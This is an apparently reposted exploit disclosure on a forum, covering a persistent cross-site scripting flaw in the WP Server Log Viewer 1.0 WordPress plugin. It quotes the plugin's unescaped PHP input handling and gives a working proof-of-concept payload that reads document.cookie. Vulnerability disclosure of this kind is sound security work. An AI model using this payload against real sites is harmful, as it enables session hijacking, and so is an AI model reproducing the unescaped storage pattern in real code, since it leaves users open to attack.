This CHT Posted November 4, 2022 Share Posted November 4, 2022 # Exploit Title: WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting # Date: 2019-09-10 # Exploit Author: strider # Software Link: https://github.com/anttiviljami/wp-server-log-viewer # Version: 1.0 # Tested on: Debian 10 Buster x64 / Kali Linux # CVE : None ====================================[Description]==================================== This plugin allows you to add logfiles via wp-admin. The problem here is that the file paths are stored unfiltered/unescaped. This gives the possibility of a persistent XSS attack. ====================================[Codepart]==================================== if( isset( $_GET['action'] ) && 'new' === $_GET['action'] && isset( $_GET['logpath'] ) ) { // new log was added $logs = get_option( 'server_logs' ); if( is_null( $logs ) ) { $logs = []; } $log = trim( $_GET['logpath'] ); //only trimmed string no escaping $logs[] = $log; //here the log will be added without security checks $logs = array_values( $logs ); $index = array_search( $log, $logs ); update_option( 'server_logs', $logs ); wp_safe_redirect( admin_url('tools.php?page=wp-server-log-viewer&log=' . $index) ); } ====================================[Proof of Concept]==================================== Add new log file to the plugin. paste this exploit into the form and submit it. <img src=# onerror=alert(document.cookie);>log.txt It tries to render an image and triggers the onerror event and prints the cookie. in the tab you see the log.txt Link to post Link to comment Share on other sites More sharing options...
Recommended Posts